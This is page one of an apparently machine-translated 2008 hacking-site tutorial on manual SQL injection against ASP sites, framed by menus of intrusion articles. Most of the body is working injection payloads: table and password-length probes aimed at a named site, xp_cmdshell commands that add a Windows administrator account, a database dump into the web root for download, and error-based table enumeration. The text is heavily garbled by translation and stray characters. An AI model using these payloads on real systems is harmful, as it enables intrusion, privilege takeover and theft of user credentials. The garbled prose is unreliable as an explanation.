Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker invade > Content
Hot Articles
The MS08-067 crack invad
Smoothwall previews low
The RPC crack invades
GE Interlogix Diamond II
when load_file() invasio
Breaks the IE safe limit
Uses 135 ports to invade
MS08-067 introduces the
The local area network i
Sharp oracle pours into
SonicWALL Customers Prot
SmoothWall Launches Smoo
Invades the WINDOWS serv
Invades RedHat the Linux
Lotus notes also plays t
Recommend Articles
Manual injection ASP scr
Simulates the intruder t
Invades the chinalinux s
The local area network i
Invades the Linux operat
Invades in the process t
Invades once more using
Invades the WINDOWS serv
PHP pours into the invas
Brief analysis Linux sys
Invades the Turkish webs
Invades RedHat the Linux
Buffer overflow analysis
Invades the Linux system
The study contains the c
New Articles
Comodo Disk Encryption n
CRYPTO-MAS-service authe
The criminal attacks Erh
Hackers and malware deve
Five steps to protect co
MI5 hack highlights secu
Kaspersky Mobile Securit
Clavister and Meru Netwo
BioSlimDisk encrypted po
Facebook users are at ri
Europ?organizations awar
Gumblar Web-based attack
2012 Olympic Games suffe
Ties aimed at both Windo
How to recover EFS encry
Manual injection ASP script study
  Add date: 07/08/2008   Publishing date: 07/08/2008   Hits: 186
Total 2 pages, Current page:1, Jump to page:
 
ACCESS

Inquiry database type  
http://www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects)

The questionnaire admin page returns to the normal demonstration to have, the mistake to not have.
http://www.zengke.com//product.asp?sort_id=24 and exists (select * from admin)

Inquires in admin table item of admin
/product.asp? sort_id=24 and exists (select admin_name from admin)  

Inquires in inside the admin table item of admin content length is smaller than makes a mistake was equal to that the returns is normal
http://www.zengke.com//product.asp?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 order by [pwd]) T order by [pwd] desc) <=7

The violence guessed that solves in admin table item of admin_name

SQL


¢Ùhttp://Site/url.asp?id=1;exec master. .xp_cmdshell “net user name password /add”--

¡¡¡¡Semicolon; In SQLServer indicated that around separates two sentences,--Expressed that the following sentence is an annotation, therefore, this sentence will be divided into SQLServer two executions, is first Select leaves ID=1 the record, then execution memory process xp_cmdshell, this memory process uses in transferring the system order, therefore, ordered newly built user named name, the password with net is the password windows account number, then:

¢Úhttp://Site/url.asp?id=1;exec master. .xp_cmdshell “net localgroup administrators name /add”--

¡¡¡¡Newly built account number name will join the manager group, does not use two minutes, you had already attained the system highest jurisdiction! Certainly, this method is only suitable in uses sa to connect the database the situation, otherwise, does not have the jurisdiction to transfer xp_cmdshell.

¡¡¡¡¢Ûhttp://Site/url.asp?id=1; ; and db_name()>0

Front has similar example and user>0, the function is gains the company to take over the use of the name of head of household, db_name() is another system variable, what returns is connection database.

¢Ühttp://Site/url.asp?id=1;backup database database to disk='c:inetpubwwwroot? .db';--

This is quite ruthless one move, from¢ÛAttains database, certain IIS makes a mistake in addition the absolute way which exposes, the database backup to the Web table of contents, uses HTTP again the entire database on complete downloading, all managers and the user password takes in everything at a glance! In does not know the absolute way time, but may also the backup to the network address method (for example \ 202.96.xx.xx Share? .db), but the success ratio is not high.

¡¡¡¡¢Ýhttp://Site/url.asp?id=1; ; and (Select Top 1 name from sysobjects where xtype='U' and status>0) >0

Front has said that sysobjects is the SQLServer system table, is saving all table name, the view, the restraint and other objects, xtype='U' and status>0, indicated that user establishment's table, the above sentence takes out first table, with 0 comparison sizes, lets the newspaper wrong information expose table. Second, how third table does gain? Leaves our intelligent reader to ponder.

 
Other pages: : 1 * 2 * Next>>
Next:Simulates the intruder to examine the network attack

Comment:

Category: Home > hacker invade
Home